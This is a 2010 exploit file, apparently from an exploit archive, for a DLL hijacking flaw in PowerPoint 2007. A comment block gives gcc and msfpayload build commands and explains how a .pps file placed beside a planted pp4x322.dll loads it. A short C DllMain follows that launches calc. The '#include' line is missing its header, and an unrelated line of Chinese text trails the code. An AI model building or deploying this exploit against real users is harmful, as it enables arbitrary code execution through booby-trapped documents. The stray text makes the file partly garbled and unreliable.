/* Exploit Title: Microsoft Windows Power Point 2007 DLL Hijacking Exploit (pp4x322.dll) Date: August 25, 2010 Author: monstream00 (monstream00 [at} hotmail.com) Software Link: http://office.microsoft.com/en-us/ Modified storm's exploit for pp4x322.dll and used Rapid7 write up to find. Happy hunting. Rapid7 write up: http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html Tested on: Windows 7 64bit, XP SP3 with MS Office PowerPoint 2007 SP2 MSO 12.0.6535.5002 http://monstream00.wordpress.com/ gcc -shared -o pp4x322.dll powerpoint2007-DLL.c or msfpayload windows/exec CMD=calc.exe D > pp4x322.dll .pps file affected. Power Point looks for pp4x322.dll in same directory as the .pps extension and loads the DLL. This will not work with real .pps but will work with a text file if extension is changed to a .pps instead of .txt. I have tested it on Windows 7 64bit and it works. Rapid 7 has a great article on DLL Hijacking and it is a must read. */ #include int hax() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { hax(); return 0; }

亚洲欧美在线